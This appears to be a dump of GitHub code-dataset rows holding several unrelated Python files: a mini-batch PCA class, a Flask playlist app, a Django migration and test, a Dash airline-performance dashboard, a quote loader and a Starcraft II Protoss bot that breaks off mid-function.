super(MiniBatchPCA, self).__init__(n_components=n_components,
whiten=whiten,
copy=copy,
batch_size=batch_size)
# some statistics
self.n_samples_seen_ = 0
self.mean_ = .0
self.var_ = .0
self.components_ = None
# if nb_samples < nb_components, then the mini batch is cached until
# we have enough samples
self._cache_batches = []
self._nb_cached_samples = 0
@property
def is_fitted(self):
return self.components_ is not None
# ==================== Training ==================== #
def fit(self, X, y=None):
"""Fit the model with X, using minibatches of size batch_size.
Parameters
----------
X: array-like, shape (n_samples, n_features)
Training data, where n_samples is the number of samples and
n_features is the number of features.
y: Passthrough for ``Pipeline`` compatibility.
Returns
-------
self: object
Returns the instance itself.
"""
X = check_array(X, copy=self.copy, dtype=[np.float64, np.float32])
n_samples, n_features = X.shape
if self.batch_size is None:
batch_size = 12 * n_features
else:
batch_size = self.batch_size
for batch in gen_batches(n_samples, batch_size):
x = X[batch]
self.partial_fit(x, check_input=False)
return self
def partial_fit(self, X, y=None, check_input=True):
"""Incremental fit with X. All of X is processed as a single batch.
Parameters
----------
X: array-like, shape (n_samples, n_features)
Training data, where n_samples is the number of samples and
n_features is the number of features.
Returns
-------
self: object
Returns the instance itself.
"""
# ====== check the samples and cahces ====== #
if check_input:
X = check_array(X, copy=self.copy, dtype=[np.float64, np.float32])
n_samples, n_features = X.shape
# check number of components
if self.n_components is None:
self.n_components_ = n_features
elif not 1 <= self.n_components <= n_features:
raise ValueError("n_components=%r invalid for n_features=%d, need "
"more rows than columns for IncrementalPCA "
"processing" % (self.n_components, n_features))
else:
self.n_components_ = self.n_components
# check the cache
if n_samples < n_features or self._nb_cached_samples > 0:
self._cache_batches.append(X)
self._nb_cached_samples += n_samples
# not enough samples yet
if self._nb_cached_samples < n_features:
return
else: # group mini batch into big batch
X = np.concatenate(self._cache_batches, axis=0)
self._cache_batches = []
self._nb_cached_samples = 0
n_samples = X.shape[0]
# ====== fit the model ====== #
if (self.components_ is not None) and (self.components_.shape[0] !=
self.n_components_):
raise ValueError("Number of input features has changed from %i "
"to %i between calls to partial_fit! Try "
"setting n_components to a fixed value." %
(self.components_.shape[0], self.n_components_))
# Update stats - they are 0 if this is the fisrt step
col_mean, col_var, n_total_samples = \
_incremental_mean_and_var(X, last_mean=self.mean_,
last_variance=self.var_,
last_sample_count=self.n_samples_seen_)
total_var = np.sum(col_var * n_total_samples)
if total_var == 0: # if variance == 0, make no sense to continue
return self
# Whitening
if self.n_samples_seen_ == 0:
# If it is the first step, simply whiten X
X -= col_mean
else:
col_batch_mean = np.mean(X, axis=0)
X -= col_batch_mean
# Build matrix of combined previous basis and new data
mean_correction = \
np.sqrt((self.n_samples_seen_ * n_samples) /
n_total_samples) * (self.mean_ - col_batch_mean)
X = np.vstack((self.singular_values_.reshape(
(-1, 1)) * self.components_, X, mean_correction))
U, S, V = linalg.svd(X, full_matrices=False)
U, V = svd_flip(U, V, u_based_decision=False)
explained_variance = S**2 / n_total_samples
explained_variance_ratio = S**2 / total_var
self.n_samples_seen_ = n_total_samples
self.components_ = V[:self.n_components_]
self.singular_values_ = S[:self.n_components_]
self.mean_ = col_mean
self.var_ = col_var
self.explained_variance_ = explained_variance[:self.n_components_]
self.explained_variance_ratio_ = \
explained_variance_ratio[:self.n_components_]
if self.n_components_ < n_features:
self.noise_variance_ = \
explained_variance[self.n_components_:].mean()
else:
self.noise_variance_ = 0.
return self
def transform(self, X, n_components=None):
# ====== check number of components ====== #
# specified percentage of explained variance
if n_components is not None:
# percentage of variances
if n_components < 1.:
_ = np.cumsum(self.explained_variance_ratio_)
n_components = (_ > n_components).nonzero()[0][0] + 1
# specific number of components
else:
n_components = int(n_components)
# ====== other info ====== #
n = X.shape[0]
if self.batch_size is None:
batch_size = 12 * len(self.mean_)
else:
batch_size = self.batch_size
# ====== start transforming ====== #
X_transformed = []
for start, end in batching(n=n, batch_size=batch_size):
x = super(MiniBatchPCA, self).transform(X=X[start:end])
if n_components is not None:
x = x[:, :n_components]
X_transformed.append(x)
return np.concatenate(X_transformed, axis=0)
def invert_transform(self, X):
return super(MiniBatchPCA, self).inverse_transform(X=X)
def transform_mpi(self, X, keep_order=True, ncpu=4, n_components=None):
""" Sample as transform but using multiprocessing """
n = X.shape[0]
if self.batch_size is None:
batch_size = 12 * len(self.mean_)
else:
batch_size = self.batch_size
batch_list = [(i, min(i + batch_size, n))
for i in range(0, n + batch_size, batch_size)
if i < n]
# ====== run MPI jobs ====== #
def map_func(batch):
start, end = batch
x = super(MiniBatchPCA, self).transform(X=X[start:end])
# doing dim reduction here save a lot of memory for
# inter-processors transfer
if n_components is not None:
x = x[:, :n_components]
# just need to return the start for ordering
yield start, x
mpi = MPI(batch_list,
func=map_func,
ncpu=ncpu,
batch=1,
hwm=ncpu * 12,
backend='python')
# ====== process the return ====== #
X_transformed = []
for start, x in mpi:
X_transformed.append((start, x))
if keep_order:
X_transformed = sorted(X_transformed, key=lambda x: x[0])
X_transformed = np.concatenate([x[-1] for x in X_transformed], axis=0)
return X_transformed
def __str__(self):
if self.is_fitted:
explained_vars = ';'.join([
ctext('%.2f' % i, 'cyan') for i in self.explained_variance_ratio_[:8]
])
else:
explained_vars = 0
s = '%s(batch_size=%s, #components=%s, #samples=%s, vars=%s)' % \
(ctext('MiniBatchPCA', 'yellow'),
ctext(self.batch_size, 'cyan'),
ctext(self.n_components, 'cyan'),
ctext(self.n_samples_seen_, 'cyan'),
explained_vars)
return s
| [
"nickartin13@gmail.com"
] | nickartin13@gmail.com |
1c0f2a09e34cbf67a520672d0823b61ead985d30 | 2f1e5da4025bd163eb62c8606d293a391476a8c4 | /HelloWorld/operators.py | 5b9645cd7afc7317899264c45fe0c5854d7d38df | [] | no_license | jtbutler31/python-code | 1a615d07c51e3e88790fd97b214399f242f8bceb | 8e52a2b73a1faeb61eadc126d9027ca5ad38f6c0 | refs/heads/main | 2023-03-06T01:06:56.169765 | 2021-02-16T23:07:03 | 2021-02-16T23:07:03 | 339,555,050 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 189 | py | a = 12
b = 3
print(a +b)
print(a-b)
print(a*b)
print(a/b)
print(a//b)
print(a%b)
print()
for i in range(1, a//b):
print(i)
i=1
print(i)
i=2
print(i)
i=3
print(i) | [
"noreply@github.com"
] | jtbutler31.noreply@github.com |
a6923463ee15fcf20bb4036e303685d1595d052c | be6739c9689f2a749d82c608efc24460907f730c | /ftp2/util/utils.py | 469e460b88bd2dd71853437d27cc1cda847d6bae | [] | no_license | kerry-gu/TProject | 1fb9ec9542bce30779aa52f854078d82c849a44f | 78c4de6454b13c00e17e49a350ae85aa2edb89f5 | refs/heads/main | 2023-04-24T02:11:59.162466 | 2021-05-16T11:32:58 | 2021-05-16T11:32:58 | 311,251,917 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 148 | py | class utils:
def dealCookie(json, mycookie):
keys = json.keys()
for key in keys:
mycookie.set_cookie(key, json[key]) | [
"549520210@qq.com"
] | 549520210@qq.com |
6251e005cdf4607a044a2a2d90ee2905b03094f4 | 81e7e1d6e3603a7815f1bd29b67d21ac3107fe0d | /app.py | 5e127f84317eabe06791d9137511057799375d97 | [] | no_license | ariesdaboy/playlistmp3 | aa803e57a0e2675e5b516cbbdff90d9e9ff43937 | d554a5ce8c27114c2b47e5a92adf8f9b221cd378 | refs/heads/main | 2023-06-19T11:15:18.668860 | 2021-07-15T22:33:47 | 2021-07-15T22:33:47 | 386,406,225 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,778 | py | from flask import Flask, render_template, request, redirect
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///musicas.sqlite3'
db = SQLAlchemy(app)
class Musica (db.Model):
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
nome = db.Column(db.String(150), nullable = False)
artista = db.Column (db.String(150), nullable = False)
link = db.Column(db.String(300), nullable = False)
def __init__(self, nome, artista, link):
self.nome = nome
self.artista = artista
self.link = link
@app.route('/')
def index():
musicas = Musica.query.all()
return render_template('index.html', musicas=musicas)
@app.route('/new', methods=['GET', 'POST'])
def new():
if request.method == 'POST':
musica = Musica (
request.form['nome'],
request.form['artista'],
request.form['link'],
)
db.session.add(musica)
db.session.commit()
return redirect ('/#playlist')
return render_template('new.html')
@app.route('/edit/<id>', methods=['GET', 'POST'])
def edit(id):
musica = Musica.query.get(id)
if request.method == "POST":
musica.nome = request.form['nome']
musica.artista = request.form['artista']
musica.link = request.form['link']
db.session.commit()
return redirect ('/#playlist')
return render_template('edit.html', musica=musica)
@app.route('/delete/<id>')
def delete(id):
musica = Musica.query.get(id)
db.session.delete(musica)
db.session.commit()
return redirect ('/#playlist')
if __name__ == '__main__':
db.create_all()
app.run(debug=True)
| [
"noreply@github.com"
] | ariesdaboy.noreply@github.com |
99fd7acd8087f799bf7d79996920d54f206498f5 | 8ae38b718deafb5d7015f793240dd37d7cd4ea6f | /base/migrations/0002_order_orderitem_review_shippingaddress.py | c70b5ccc0b49e72c87b89ac630a36ddf5e8fa4fd | [] | no_license | trungpnt/delectrons-django-reactjs | 5fa840535e3294b08c54a8edc73e3c04cf8530f6 | 025843434d831822bd8d24476177b075ada76452 | refs/heads/master | 2023-05-15T04:34:52.753378 | 2021-06-08T01:15:43 | 2021-06-08T01:15:43 | 374,842,282 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,741 | py | # Generated by Django 3.1.4 on 2020-12-24 01:14
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('base', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Order',
fields=[
('paymentMethod', models.CharField(blank=True, max_length=200, null=True)),
('taxPrice', models.DecimalField(blank=True, decimal_places=2, max_digits=7, null=True)),
('shippingPrice', models.DecimalField(blank=True, decimal_places=2, max_digits=7, null=True)),
('totalPrice', models.DecimalField(blank=True, decimal_places=2, max_digits=7, null=True)),
('isPaid', models.BooleanField(default=False)),
('paidAt', models.DateTimeField(blank=True, null=True)),
('isDelivered', models.BooleanField(default=False)),
('deliveredAt', models.DateTimeField(blank=True, null=True)),
('createdAt', models.DateTimeField(auto_now_add=True)),
('_id', models.AutoField(editable=False, primary_key=True, serialize=False)),
('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='ShippingAddress',
fields=[
('address', models.CharField(blank=True, max_length=200, null=True)),
('city', models.CharField(blank=True, max_length=200, null=True)),
('postalCode', models.CharField(blank=True, max_length=200, null=True)),
('country', models.CharField(blank=True, max_length=200, null=True)),
('shippingPrice', models.DecimalField(blank=True, decimal_places=2, max_digits=7, null=True)),
('_id', models.AutoField(editable=False, primary_key=True, serialize=False)),
('order', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='base.order')),
],
),
migrations.CreateModel(
name='Review',
fields=[
('name', models.CharField(blank=True, max_length=200, null=True)),
('rating', models.IntegerField(blank=True, default=0, null=True)),
('comment', models.TextField(blank=True, null=True)),
('_id', models.AutoField(editable=False, primary_key=True, serialize=False)),
('product', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='base.product')),
('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='OrderItem',
fields=[
('name', models.CharField(blank=True, max_length=200, null=True)),
('qty', models.IntegerField(blank=True, default=0, null=True)),
('price', models.DecimalField(blank=True, decimal_places=2, max_digits=7, null=True)),
('image', models.CharField(blank=True, max_length=200, null=True)),
('_id', models.AutoField(editable=False, primary_key=True, serialize=False)),
('order', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='base.order')),
('product', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='base.product')),
],
),
]
| [
"trungpnt0605@gmail.com"
] | trungpnt0605@gmail.com |
7b90e48776cb5ed1906723a385865f67f4255930 | 08c3c91ed4b25ef357de275333576de8e045df67 | /src/rockman/todo/tests.py | 220f7a36c09fbb3296f46c52048a39d8522ab3f4 | [
"MIT"
] | permissive | rockmans/personal-website | 39f50153836c49b547f9d133612be5e4be3d334f | 093ef59db2e5a248b817884355804ba0a405adad | refs/heads/master | 2020-04-10T18:51:16.690607 | 2016-06-01T16:43:51 | 2016-06-01T16:43:51 | 30,776,441 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 504 | py | from django.test import TestCase
from rockman.todo.models import Todo
from datetime import datetime
class TodoTestCase(TestCase):
def setUp(self):
due_date = datetime.now()
Todo.objects.create(task="Make test.", category="House", assignee="Emily", due=due_date)
def test_return_tasks(self):
"""Play test case for place holding to get testing up and running"""
todo_task = Todo.objects.get(assignee="Emily")
self.assertEqual(todo_task.task, 'Make test.')
| [
"ebuschang@gmail.com"
] | ebuschang@gmail.com |
dbe474c564414f43e0516ca3ee5aae0b9a163e11 | 3f6ab15b90bf23e5a5cc0a203e876f1caa32b023 | /dash12.py | e914edd85b71d5f61e22e88f2d021a9daf589e1b | [] | no_license | vivinandlin/0630 | 0fff3775176893b2bdc221a4c814256981b26885 | c8970fbc30388507b1a239c5c3489a504e1fdb29 | refs/heads/main | 2023-06-05T20:40:32.358286 | 2021-06-30T10:29:54 | 2021-06-30T10:29:54 | 381,614,409 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,997 | py | # -*- coding: utf-8 -*-
"""Untitled13.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/11vbtKr83jQ2P9cCz320AMJBZAMIx5_df
"""
# Import required libraries
import pandas as pd
import dash
import dash_html_components as html
import dash_core_components as dcc
from dash.dependencies import Input, Output, State
import plotly.graph_objects as go
import plotly.express as px
#from dash import no_update
# Create a dash application
app = dash.Dash(__name__)
# REVIEW1: Clear the layout and do not display exception till callback gets executed
app.config.suppress_callback_exceptions = True
# Read the airline data into pandas dataframe
airline_data = pd.read_csv('https://cf-courses-data.s3.us.cloud-object-storage.appdomain.cloud/IBMDeveloperSkillsNetwork-DV0101EN-SkillsNetwork/Data%20Files/airline_data.csv',
encoding = "ISO-8859-1",
dtype={'Div1Airport': str, 'Div1TailNum': str,
'Div2Airport': str, 'Div2TailNum': str})
# List of years
year_list = [i for i in range(2005, 2021, 1)]
"""Compute graph data for creating yearly airline performance report
Function that takes airline data as input and create 5 dataframes based on the grouping condition to be used for plottling charts and grphs.
Argument:
df: Filtered dataframe
Returns:
Dataframes to create graph.
"""
def compute_data_choice_1(df):
# Cancellation Category Count
bar_data = df.groupby(['Month','CancellationCode'])['Flights'].sum().reset_index()
# Average flight time by reporting airline
line_data = df.groupby(['Month','Reporting_Airline'])['AirTime'].mean().reset_index()
# Diverted Airport Landings
div_data = df[df['DivAirportLandings'] != 0.0]
# Source state count
map_data = df.groupby(['OriginState'])['Flights'].sum().reset_index()
# Destination state count
tree_data = df.groupby(['DestState', 'Reporting_Airline'])['Flights'].sum().reset_index()
return bar_data, line_data, div_data, map_data, tree_data
"""Compute graph data for creating yearly airline delay report
This function takes in airline data and selected year as an input and performs computation for creating charts and plots.
Arguments:
df: Input airline data.
Returns:
Computed average dataframes for carrier delay, weather delay, NAS delay, security delay, and late aircraft delay.
"""
def compute_data_choice_2(df):
# Compute delay averages
avg_car = df.groupby(['Month','Reporting_Airline'])['CarrierDelay'].mean().reset_index()
avg_weather = df.groupby(['Month','Reporting_Airline'])['WeatherDelay'].mean().reset_index()
avg_NAS = df.groupby(['Month','Reporting_Airline'])['NASDelay'].mean().reset_index()
avg_sec = df.groupby(['Month','Reporting_Airline'])['SecurityDelay'].mean().reset_index()
avg_late = df.groupby(['Month','Reporting_Airline'])['LateAircraftDelay'].mean().reset_index()
return avg_car, avg_weather, avg_NAS, avg_sec, avg_late
# Application layout
app.layout = html.Div(children=[
# TASK1: Add title to the dashboard
# Enter your code below. Make sure you have correct formatting.
html.H2('US Domestic Airline Flights Performance',style={'textAlign':'center','color':'#503d36','font-size':25}),
# REVIEW2: Dropdown creation
# Create an outer division
html.Div([
# Add an division
html.Div([
# Create an division for adding dropdown helper text for report type
html.Div(
[
html.H2('Report Type:', style={'margin-right': '2em'}),
]
),
# TASK2: Add a dropdown
# Enter your code below. Make sure you have correct formatting.
dcc.Dropdown(id='input-type',
# Update dropdown values using list comphrehension
options=[{'label': 'Yearly Airline performance', 'value':'OPT1'},{'label':'Yearly Airline Delay Report','value':'OPT2'}],
placeholder="Select a report type",
style={'width':'80%', 'padding':'3px', 'font-size': '20px', 'text-align-last' : 'center'}),
# Place them next to each other using the division style
], style={'display':'flex'}),
# Add next division
html.Div([
# Create an division for adding dropdown helper text for choosing year
html.Div(
[
html.H2('Choose Year:', style={'margin-right': '2em'})
]
),
dcc.Dropdown(id='input-year',
# Update dropdown values using list comphrehension
options=[{'label': i, 'value': i} for i in year_list],
placeholder="Select a year",
style={'width':'80%', 'padding':'3px', 'font-size': '20px', 'text-align-last' : 'center'}),
# Place them next to each other using the division style
], style={'display': 'flex'}),
]),
# Add Computed graphs
# REVIEW3: Observe how we add an empty division and providing an id that will be updated during callback
html.Div([ ], id='plot1'),
html.Div([
html.Div([ ], id='plot2'),
html.Div([ ], id='plot3')
], style={'display': 'flex'}),
# TASK3: Add a division with two empty divisions inside. See above disvision for example.
# Enter your code below. Make sure you have correct formatting.
html.Div([
html.Div([ ], id='plot4'),
html.Div([ ], id='plot5')
], style={'display': 'flex'})
])
# Callback function definition
# TASK4: Add 5 ouput components
# Enter your code below. Make sure you have correct formatting.
@app.callback( [Output(component_id='plot1', component_property='children'),
Output(component_id='plot2', component_property='children'),
Output(component_id='plot3', component_property='children'),
Output(component_id='plot4', component_property='children'),
Output(component_id='plot5', component_property='children')],
[Input(component_id='input-type', component_property='value'),
Input(component_id='input-year', component_property='value')],
# REVIEW4: Holding output state till user enters all the form information. In this case, it will be chart type and year
[State("plot1", 'children'), State("plot2", "children"),
State("plot3", "children"), State("plot4", "children"),
State("plot5", "children")
])
# Add computation to callback function and return graph
def get_graph(chart, year, children1, children2, c3, c4, c5):
# Select data
df = airline_data[airline_data['Year']==int(year)]
if chart == 'OPT1':
# Compute required information for creating graph from the data
bar_data, line_data, div_data, map_data, tree_data = compute_data_choice_1(df)
# Number of flights under different cancellation categories
bar_fig = px.bar(bar_data, x='Month', y='Flights', color='CancellationCode', title='Monthly Flight Cancellation')
# TASK5: Average flight time by reporting airline
# Enter your code below. Make sure you have correct formatting.
# Percentage of diverted airport landings per reporting airline
pie_fig = px.pie(div_data, values='Flights', names='Reporting_Airline', title='% of flights by reporting airline')
# REVIEW5: Number of flights flying from each state using choropleth
map_fig = px.choropleth(map_data, # Input data
locations='OriginState',
color='Flights',
hover_data=['OriginState', 'Flights'],
locationmode = 'USA-states', # Set to plot as US States
color_continuous_scale='GnBu',
range_color=[0, map_data['Flights'].max()])
map_fig.update_layout(
title_text = 'Number of flights from origin state',
geo_scope='usa') # Plot only the USA instead of globe
# TASK6: Number of flights flying to each state from each reporting airline
# Enter your code below. Make sure you have correct formatting.
tree_fig = px.treemap(tree_data,path=['DestState', 'Reporting_Airline'],values='Flights',color='Flights',color_continuous_scale='RdBu',title='Flight count by airline to destination state')
# REVIEW6: Return dcc.Graph component to the empty division
return [dcc.Graph(figure=tree_fig),
dcc.Graph(figure=pie_fig),
dcc.Graph(figure=map_fig),
dcc.Graph(figure=bar_fig),
dcc.Graph(figure=line_fig)
]
else:
# REVIEW7: This covers chart type 2 and we have completed this exercise under Flight Delay Time Statistics Dashboard section
# Compute required information for creating graph from the data
avg_car, avg_weather, avg_NAS, avg_sec, avg_late = compute_data_choice_2(df)
# Create graph
carrier_fig = px.line(avg_car, x='Month', y='CarrierDelay', color='Reporting_Airline', title='Average carrrier delay time (minutes) by airline')
weather_fig = px.line(avg_weather, x='Month', y='WeatherDelay', color='Reporting_Airline', title='Average weather delay time (minutes) by airline')
nas_fig = px.line(avg_NAS, x='Month', y='NASDelay', color='Reporting_Airline', title='Average NAS delay time (minutes) by airline')
sec_fig = px.line(avg_sec, x='Month', y='SecurityDelay', color='Reporting_Airline', title='Average security delay time (minutes) by airline')
late_fig = px.line(avg_late, x='Month', y='LateAircraftDelay', color='Reporting_Airline', title='Average late aircraft delay time (minutes) by airline')
return[dcc.Graph(figure=carrier_fig),
dcc.Graph(figure=weather_fig),
dcc.Graph(figure=nas_fig),
dcc.Graph(figure=sec_fig),
dcc.Graph(figure=late_fig)]
# Run the app
if __name__ == '__main__':
app.run_server(debug=True) | [
"noreply@github.com"
] | vivinandlin.noreply@github.com |
feea70d9fcfd418dfd3af9a5b19202c181470c63 | bdd3516822715bff32c6be4d57f9af9abfa269dc | /src/quote.py | 062f67437562637958464e9619ddcfaffe3350e0 | [] | no_license | permag/testing_a2 | 404936fbaa47f39c488396e26e80aaca5be9c683 | 5465832ee60d9eb662782c1a64a09dc017e950bc | refs/heads/master | 2021-01-25T04:03:07.000522 | 2014-01-06T18:08:16 | 2014-01-06T18:08:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,088 | py | # -*- coding: utf-8 -*-
import sys, json, random
class Quote:
def __init__(self):
# init
self.current = -1
self.quotes_data = []
self.quote_count = 0
#
self.quotes_data = self.get_shuffle_data(self.get_data())
self.quote_count = len(self.quotes_data)
def get_data(self, file_path=None):
if not file_path:
file_path = 'src/data.json'
try:
with open(file_path) as json_data:
data = json.load(json_data)
except IOError:
raise
return data
def get_shuffle_data(self, data):
if data:
random.shuffle(data)
return data
else:
raise Exception('No data.')
def get_next(self):
self.current += 1
curr_quote = self.quotes_data[self.current]
authors = []
for a in curr_quote['author']:
authors.append(str(a).encode('utf-8'))
return {'quote': str(curr_quote['quote'].encode('utf-8')),
'author': authors}
| [
"killingfloor00@gmail.com"
] | killingfloor00@gmail.com |
1e77fbaa5f0a74d683e6ac5aff6046ee957f0331 | 801fd0692068c8950ff1f06eec22d94bcca0ab01 | /Sentinel/sentinel.py | 9ca87bf50e3e6611ac592c6d355c1b1076e83f99 | [] | no_license | 0MNIP0TENT/Sentinel-Starcraft2-Bot | f42de38cbc51e79cf493ed6bb039e20ae2f989e4 | 3116edf7ffa923027dd19684f898d83ac8f62295 | refs/heads/master | 2020-04-19T07:58:46.113176 | 2019-01-29T01:08:08 | 2019-01-29T01:08:08 | 168,063,054 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,646 | py | import sc2
from sc2 import run_game, maps, Race, Difficulty, position
from sc2.position import Point2
from sc2.player import Bot, Computer
from sc2.constants import NEXUS, PROBE, PYLON, ROBOTICSFACILITY, ASSIMILATOR, GATEWAY, \
CYBERNETICSCORE, STALKER, IMMORTAL,STARGATE, VOIDRAY, ZEALOT, FORGE, PHOTONCANNON, \
STARGATE, FLEETBEACON, VOIDRAY, CARRIER, SENTRY, PROTOSSAIRWEAPONSLEVEL1, \
PROTOSSAIRARMORSLEVEL1
import random
from random import randint
from operator import or_
from sc2.constants import *
class Sentinel(sc2.BotAI):
def __init__(self):
self.air_weapon1_started = False
self.air_weapon2_started = False
self.air_weapon3_started = False
self.air_armor1_started = False
self.air_armor2_started = False
self.air_armor3_started = False
async def on_step(self,iteration):
await self.distribute_workers()
await self.expand()
await self.build_workers()
await self.build_buildings()
await self.build_army()
await self.upgrade_air()
await self.patrol(iteration)
await self.attack()
await self.scout()
async def scout(self):
if self.supply_used >= 190:
if not self.units(ZEALOT).ready.exists:
for gateway in self.units(GATEWAY).ready.noqueue:
if self.can_afford(ZEALOT):
await self.do(gateway.train(ZEALOT))
if self.units(ZEALOT).ready.exists:
scout = self.units(ZEALOT).first
if scout.is_idle:
await self.do(scout.attack(random.choice(self.enemy_start_locations)))
async def expand(self):
if self.units(NEXUS).amount < 2 and self.can_afford(NEXUS) and not self.already_pending(NEXUS):
await self.expand_now()
if self.supply_used > 80 and self.units(NEXUS).amount < 3 and self.can_afford(NEXUS) and not self.already_pending(NEXUS):
await self.expand_now()
if self.supply_used > 120 and self.units(NEXUS).amount < 4 and self.can_afford(NEXUS) and not self.already_pending(NEXUS):
await self.expand_now()
async def build_workers(self):
if (len(self.units(NEXUS)) * 16) > len(self.units(PROBE)):
for nexus in self.units(NEXUS).ready.noqueue:
if self.can_afford(PROBE) and not self.already_pending(PROBE):
await self.do(nexus.train(PROBE))
# build build buildings code
async def build_buildings(self):
# build pylons
await self.build_pylons()
# build assimilators
await self.build_assimilators()
# build gateways
await self.build_gateways()
# build cybernetics core
await self.build_ccore()
# build photon cannons
#await self.build_cannons()
# build stargate
await self.build_stargates()
# build fleet beacon
await self.build_fleet_beacon()
#build robotics facility
#await self.build_robotics_facility()
# build pylons
async def build_pylons(self):
if self.supply_left < 10 and not self.supply_cap == 200:
nexuses = self.units(NEXUS).ready
if nexuses.exists:
if self.can_afford(PYLON):
# if self.units(PYLON).amount < 1:
# await self.build(PYLON, self.main_base_ramp.top_center)
# else:
await self.build(PYLON, near=nexuses.first)
# -> builds assimilators
async def build_assimilators(self):
for nexus in self.units(NEXUS).ready:
vaspenes = self.state.vespene_geyser.closer_than(15.0, nexus)
for vaspene in vaspenes:
if not self.can_afford(ASSIMILATOR) and not self.already_pending(ASSIMILATOR):
break
worker = self.select_build_worker(vaspene.position)
if worker is None:
break
if not self.units(ASSIMILATOR).closer_than(1.0, vaspene).exists:
await self.do(worker.build(ASSIMILATOR, vaspene))
# -> builds gateway(s)
async def build_gateways(self):
if self.units(GATEWAY).amount < 1:
if self.can_afford(GATEWAY) and not self.already_pending(GATEWAY):
if self.units(PYLON).ready.exists:
pylon = self.units(PYLON).random
await self.build(GATEWAY, near=pylon)
# -> builds cynernetics core
async def build_ccore(self):
if self.units(GATEWAY).ready.exists and not self.units(CYBERNETICSCORE):
if self.can_afford(CYBERNETICSCORE) and not self.already_pending(CYBERNETICSCORE):
pylon = self.units(PYLON).random
await self.build(CYBERNETICSCORE, near=pylon)
# -> builds stargates
async def build_stargates(self):
if self.units(CYBERNETICSCORE).ready.exists:
if self.can_afford(STARGATE) and self.units(STARGATE).amount < 2:
pylon = self.units(PYLON).random
await self.build(STARGATE, near=pylon)
elif self.units(VOIDRAY).amount + self.units(CARRIER).amount > 3 and self.units(STARGATE).amount < 3:
pylon = self.units(PYLON).ready.random
await self.build(STARGATE, near=pylon)
elif self.supply_used > 195 and self.units(STARGATE).amount < 7:
pylon = self.units(PYLON).random
await self.build(STARGATE, near=pylon)
async def build_fleet_beacon(self):
if not self.units(FLEETBEACON).ready.exists and not self.already_pending(FLEETBEACON):
if self.units(PYLON).ready.exists:
pylon = self.units(PYLON).ready.random
await self.build(FLEETBEACON, near=pylon)
# -> builds forge
async def build_forge(self):
if self.units(FORGE).amount < 1 and self.can_afford(FORGE):
if not self.already_pending(FORGE):
pylon = self.units(PYLON).random
await self.build(FORGE, near=pylon)
# -> build robotics facility
async def build_robotics_facility(self):
if self.units(CYBERNETICSCORE).ready.exists:
if self.units(ROBOTICSFACILITY).amount < 3 and not self.already_pending(ROBOTICSFACILITY):
if self.can_afford(ROBOTICSFACILITY):
pylon = self.units(PYLON).random
await self.build(ROBOTICSFACILITY, near=pylon)
# -> build cannons
async def build_cannons(self):
await self.build_forge()
# build PHOTONCANNONs
if self.units(PYLON).ready.exists and self.units(PHOTONCANNON).amount < 20:
pylon = self.units(PYLON).random
await self.build(PHOTONCANNON, near=pylon)
# -> End of building code
# -> training army code
async def build_army(self):
#train zealots
await self.train_zealots()
#await self.train_sentrys()
#await self.train_stalkers()
#await self.train_immortals()
await self.train_voidrays()
await self.train_carriers()
# train zealots
async def train_zealots(self):
if not self.units(FLEETBEACON).ready.exists:
for gateway in self.units(GATEWAY).ready.noqueue:
if self.can_afford(ZEALOT):
await self.do(gateway.train(ZEALOT))
# train sentrys
async def train_sentrys(self):
for gateway in self.units(GATEWAY).ready.noqueue:
if self.can_afford(SENTRY) and self.units(CYBERNETICSCORE).ready.exists:
if self.units(SENTRY).amount <= self.units(STALKER).amount / 5:
await self.do(gateway.train(SENTRY))
# train stalkers
async def train_stalkers(self):
if not self.units(FLEETBEACON).ready:
for gateway in self.units(GATEWAY).ready.noqueue:
if self.can_afford(STALKER):
await self.do(gateway.train(STALKER))
# train immortal
async def train_immortals(self):
if self.units(ROBOTICSFACILITY).ready.exists:
for robofac in self.units(ROBOTICSFACILITY):
if self.can_afford(IMMORTAL):
await self.do(robofac.train(IMMORTAL))
# train voidrays
async def train_voidrays(self):
for stargates in self.units(STARGATE).ready.noqueue:
if self.units(FLEETBEACON).ready.exists:
if self.units(VOIDRAY).amount < self.units(CARRIER).amount * 3:
if self.can_afford(VOIDRAY):
await self.do(stargates.train(VOIDRAY))
else:
if self.can_afford(VOIDRAY):
await self.do(stargates.train(VOIDRAY))
async def train_carriers(self):
if self.units(FLEETBEACON).ready.exists:
for stargate in self.units(STARGATE).ready.noqueue:
if self.can_afford(CARRIER):
await self.do(stargate.train(CARRIER))
# End of training
def find_target(self, state):
if len(self.known_enemy_units) > 0:
return random.choice(self.known_enemy_units)
elif len(self.known_enemy_structures) > 0:
return random.choice(self.known_enemy_structures)
else:
# for one opponet
#return self.enemy_start_locations[0]
# for multiple opponets
return random.choice(self.enemy_start_locations)
# patrol function
async def patrol(self,iteration):
enemys = self.known_enemy_units
if self.units(NEXUS).amount > 1 and self.supply_used < 150:
if iteration % 20 == 0:
forces = self.units(VOIDRAY).ready.idle | self.units(CARRIER).ready.idle | self.units(ZEALOT).ready.idle
orders = []
bases = self.units(NEXUS)
for unit in forces:
# create order list
for base in bases:
destination = randint(4,15)
pos = base.position.to2.towards(self.game_info.map_center,destination)
